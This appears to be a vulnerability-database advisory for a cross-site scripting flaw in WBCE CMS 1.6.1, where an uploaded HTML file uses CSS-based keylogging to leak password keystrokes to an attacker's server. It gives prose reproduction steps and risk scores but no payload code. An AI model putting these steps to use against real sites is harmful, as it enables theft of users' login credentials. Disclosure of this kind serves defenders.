Primary

Context

WBCE CMS Cross-Site Scripting Vulnerability Allowing Keylogging

Vulnerability

A cross-site scripting vulnerability has been identified in WBCE CMS version 1.6.1. This issue allows attackers to inject malicious HTML and CSS, enabling the capture of user keystrokes. By uploading a crafted HTML file that utilizes CSS-based keylogging techniques, attackers can intercept password characters through background image requests.

Impact

Exploitation of this vulnerability allows for cross-site scripting, with the added consequence of keylogging, specifically targeting password inputs.

Reproduction

To reproduce this vulnerability, upload an HTML file containing keylogging CSS styles into the media section of WBCE CMS 1.6.1. After uploading, access the file to activate the keylogging script. Once the keylogger is active, log out and return to the login page. The keylogger will send captured keystrokes to the attacker's server.

Added: Dec 16, 2025, 5:53 PM

Updated: Dec 16, 2025, 7:25 PM

Vulnerability Rating

Custom Algorithm

spread

1.0

impact

1.7

exploitability

6.5

remediation

0.0

relevance

1.5

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

1.0

impact

1.7

exploitability

6.5

remediation

0.0

relevance

1.5

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

WBCE CMS Cross-Site Scripting Vulnerability Allowing Keylogging

Vulnerability

Impact

Reproduction

Affected Products

WBCE CMS

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating